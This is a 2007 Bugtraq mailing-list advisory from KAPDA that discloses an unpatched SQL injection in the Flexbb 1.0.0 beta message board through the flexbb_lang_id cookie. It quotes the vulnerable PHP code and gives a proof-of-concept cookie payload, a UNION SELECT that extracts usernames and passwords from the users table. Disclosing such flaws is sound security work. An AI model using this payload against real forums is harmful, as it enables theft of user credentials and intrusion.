| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | [KAPDA::#64] - Flexbb Sql Injection |
| From: | alireza hassani <trueend5@yahoo.com> |
| Date: | Tue, 27 Mar 2007 01:57:24 -0700 (PDT) |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| Domainkey-signature: | a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID; b=uCmvNuOo5s15EBgjd7/8O4gc0SdkkedjPhUdHq8N6qaAg3XW1V/dLamU1xvE7ZQfNTlX8AhMP44jJSCOCrN16VQZO5ERR5re69W4YzqsAX0C+MAKTVUutLSvrMd40CYVtXrQ9vfjeFWH5D5RC7tNJVMw/Uz+HBZ/O4lugCoUHug=; |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
KAPDA New advisory Vendor: http://www.flexbb.net Vulnerable Version: 1.0.0 10005 Beta Release 1 Bug: SQL Injection Exploitation: Remote with browser Description: -------------------- Flexbb is a freely available PHP-based message board program that uses a MySQL database. Vulnerability: -------------------- Sql Injection: The software does not properly validate user-supplied input that may allow a remote user to launch Sql injection attacks. There are multiple Input Validation errors, for example: // Code Snippet // Includes/Start.php // Lines #190-197 if($_COOKIE['flexbb_lang_id'] == "") { $lang_id = $config['default_lang_id']; } else { $lang_id = $_COOKIE['flexbb_lang_id']; //--->Input Validation Error } POC: -------------------- Condition: Magic quotes GPC = Off GET: http://example.com/flexbb/index.php?debug=1 Cookie Name = flexbb_lang_id Cookie Value = none' UNION SELECT 'en',`username`, `password`,1,1 FROM `flexbb_users` WHERE `group` = '4 original Advisory: -------------------- http://www.kapda.ir/advisory-481.html Solution: -------------------- No response from vendor, there is no solution at the time of this entry. Credit : -------------------- Discovered & released by trueend5 (trueend5 kapda ir) Security Science Researchers Institute Of Iran [http://www.KAPDA.ir] ____________________________________________________________________________________ TV dinner still cooling? Check out "Tonight's Picks" on Yahoo! TV. http://tv.yahoo.com/ |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Metasploit Framework 3.0 RELEASED!, H D Moore |
|---|---|
| Next by Date: | [ECHO_ADV_78$2007] C-Arbre <= 0.6PR7 (root_path) Remote File Inclusion Vulnerability, erdc |
| Previous by Thread: | Metasploit Framework 3.0 RELEASED!, H D Moore |
| Next by Thread: | [ECHO_ADV_78$2007] C-Arbre <= 0.6PR7 (root_path) Remote File Inclusion Vulnerability, erdc |
| Indexes: | [Date] [Thread] [Top] [All Lists] |